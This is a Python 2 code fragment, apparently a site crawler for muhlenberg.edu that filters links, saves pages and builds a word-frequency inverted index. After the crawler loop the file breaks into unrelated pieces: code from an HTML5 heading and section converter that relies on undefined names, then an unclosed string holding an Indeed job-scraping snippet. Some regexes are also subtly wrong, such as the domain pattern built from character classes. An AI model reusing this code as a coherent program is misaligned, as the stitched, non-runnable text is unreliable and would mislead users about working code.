                        if re.search(r"muhlenberg", newLink):
                            if not re.search(r"\#", newLink):
                                try:
                                    # Skip PDFs and other excluded URL patterns
                                    if not (re.match(r".*.pdf$", str(newLink))
                                            or re.match(r".*sync\.muhlenberg\.edu.*", str(newLink))
                                            or re.match(r".*capstone.*", str(newLink))
                                            or re.match(r".*blogs.*", str(newLink))
                                            or re.match(r"http://www.muhlenberg.edu\w+.html", str(newLink))):
                                        if not (re.match(r".*javascript.*", str(newLink))
                                                or re.match(r".*webapp.*", str(newLink))
                                                or re.match(r".*edumailto.*", str(newLink))):
                                            add = True
                                            for nope, value in evadeAndConquor.items():
                                                if re.search(r".*" + nope + r".*", str(newLink)):
                                                    add = False
                                            if add:
                                                # Enqueue the link if it has not been visited before
                                                if visitedHash.get(newLink, False) == False:
                                                    linksQ.enqueue(newLink)
                                except:
                                    print "Your URL is not a string:", newLink
                    # Relative URL: prepend the host part of the current URL
                    else:
                        if not re.search(r"\#", newLink):
                            # TODO: make sure this works for every case
                            end = url.find(r'/', 7)
                            newLink = url[0:end] + newLink
                            try:
                                # Skip PDFs and other excluded URL patterns
                                if not (re.match(r".*.pdf$", str(newLink))
                                        or re.match(r".*sync\.muhlenberg\.edu.*", str(newLink))
                                        or re.match(r".*capstone.*", str(newLink))
                                        or re.match(r".*blogs.*", str(newLink))
                                        or re.match(r"http://www.muhlenberg.edu\w+.html", str(newLink))):
                                    if not (re.match(r".*javascript.*", str(newLink))
                                            or re.match(r".*webapp.*", str(newLink))
                                            or re.match(r".*edumailto.*", str(newLink))):
                                        add = True
                                        for nope, value in evadeAndConquor.items():
                                            if re.search(r".*" + nope + r".*", str(newLink)):
                                                add = False
                                        if add:
                                            # Enqueue the link if it has not been visited before
                                            if visitedHash.get(newLink, False) == False:
                                                linksQ.enqueue(newLink)
                            except:
                                print "Your URL is not a string:", newLink
            i += 1
            # Save the prettified page so it can be re-read later
            tempDoc = open("Files/Documents/doc" + str(i) + ".txt", 'w')
            for line in soup.prettify():
                tempDoc.write(line)
            tempDoc.close()
            # Tokenise every <p> tag: build a per-document frequency hash
            # (TempDictForWordFreq) and a global frequency hash.
            for line in soup.findAll('p'):
                if not line.find('iframe'):
                    line = line.text
                    if not re.match(r"http\:\/\/.*", line):
                        if line != None:
                            words = line.split(' ')
                            for word in words:
                                if re.search(r"\.([com]|[org]|[net]|[int]|[edu]|[gov])", word):
                                    word = word.replace(word, "")
                                # TODO: maybe remove hyphens?
                                token = re.sub(r"&\w*;", "", word)
                                token = re.sub(r"[^A-Za-z\']*", "", token)
                                token = re.sub(r"[\t]", "", token)
                                token = token.lower()
                                if token != "" and token != " ":
                                    if stemWords:
                                        token = stemmer.lemmatize(token, 'v')
                                        token = stemmer.lemmatize(token, 'n')
                                    token = token.strip()
                                    if len(token) > 1:
                                        if removeStopWords:
                                            # Only count the token if it is not a stop word
                                            if stopWords.get(token, False) == False:
                                                if not re.search(r'\r\n', token):
                                                    TempDictForWordFreq[token] = int(TempDictForWordFreq.get(token, 0)) + 1
                                                    GlobalDictForWordFreq[token] = int(GlobalDictForWordFreq.get(token, 0)) + 1
                                        else:
                                            TempDictForWordFreq[token] = int(TempDictForWordFreq.get(token, 0)) + 1
                                            GlobalDictForWordFreq[token] = int(GlobalDictForWordFreq.get(token, 0)) + 1
            j += 1
            i = j
            # Merge this document's counts into the inverted index:
            # token -> list of [doc number, frequency] pairs.
            for key, val in TempDictForWordFreq.items():
                if JuLiDoTheThing.get(key, False) != False:
                    FerricksList = JuLiDoTheThing.get(key, False)
                    FerricksList.append([i, val])
                    JuLiDoTheThing[key] = FerricksList
                else:
                    FerricksList = list()
                    FerricksList.append([i, val])
                    JuLiDoTheThing[key] = FerricksList
            # Mark this document as visited
            visitedHash[url.strip()] = i
            print "Document", i, "has been processed."
            last = False
infile.close()

if options.replace:
    outfile = open(infilepath, 'w')
else:
    try:
        outfilepath = args[1]
    except IndexError:
        outfile = sys.stdout
    else:
        outfile = open(outfilepath, 'w')

soup = BeautifulSoup(inhtml)
parser = html5lib.HTMLParser(tree=treebuilders.getTreeBuilder("lxml"))
doc = parser.parse(soup.prettify())

"""
Convert headings to hgroups where appropriate
---------------------------------------------
"""
if options.hgroup:
    hgroupise(doc)

if options.section:
    sectionise(doc)

if options.normalize:
    normalize(doc)

"""
import requests
from BeautifulSoup import BeautifulSoup

url = 'https://www.indeed.com/jobs?q=Entry-Level+Machine+Learning+&l=San+Francisco&radius=25'
response = requests.get(url)
html = response.content
soup = BeautifulSoup(html)
table = soup.find('tbody', attrs={'class': 'stripe'})
print soup.prettify()